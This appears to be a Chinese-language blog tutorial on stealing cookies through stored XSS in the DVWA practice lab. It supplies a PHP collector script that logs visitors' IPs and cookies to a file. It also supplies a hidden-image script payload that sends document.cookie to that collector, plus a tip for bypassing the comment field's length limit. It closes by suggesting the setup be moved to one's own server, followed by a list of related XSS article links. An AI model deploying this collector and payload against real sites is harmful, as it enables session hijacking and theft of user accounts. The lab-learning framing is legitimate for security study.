存储xss实现获取cookie(本地实战)

实战更能体验收获!!!

环境准备:

1.phpstudy

2.dvwa靶场

实战

首先我们在phpstudy指定的localhost网站目录下编写一个xss.php文件,内容如下:

复制代码
<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 

然后进入dvwa靶场(security=low),(stored xss)那关,留言写入如下payload。

payload:<script>document.write('<img src="http://127.0.0.1/xss.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');</script>

但是此关卡有长度限制,简单直接前端改一下长度即可:

50改为1000

刷新一下网页

然后到我们写的xss.php文件的目录下,会有一个cookie.txt文件,上面就会记录cookie及其IP

留言

实战结束留言:如果你拥有自己的网站以及服务器,本地实战就在你自己的服务器上实战即可,不过此处的IP地址也要跟着变化,不变化其实也行,但是改了更有实战的感觉,在此祝你们学习顺利!!!

相关推荐
llxxyy卢12 小时前
XSS跨站之订单及shell箱子反杀记
前端·xss
老马爱知12 小时前
第5篇 | Web应用的“外邪”:XSS、CSRF与SSRF漏洞详解
web安全·xss·csrf·零信任·ssrf·信任边界·攻防启示录
llxxyy卢12 小时前
xss-maps(1-12)尝试思路过关加源码分析
前端·xss
二川bro6 天前
第54节:安全防护 - 3D场景中的XSS防御
安全·3d·xss
爱隐身的官人6 天前
beef-xss hook.js访问失败500错误
javascript·xss
llxxyy卢7 天前
了解xss漏洞pikachu的三大基础xss和xss平台
安全·web安全·xss
Andya_net8 天前
网络安全 | 深入解析XSS攻击与防御实战
安全·web安全·xss
michaelzhouh18 天前
php项目ueditor上传pdf文件,防止XSS攻击
pdf·php·xss·ueditor
wgego19 天前
做题笔记BUU (XSS-Lab)(1-14)
前端·笔记·xss
mooyuan天天20 天前
CTFHub XSS通关:XSS-过滤关键词
xss·关键字过滤·ctfhub·xss漏洞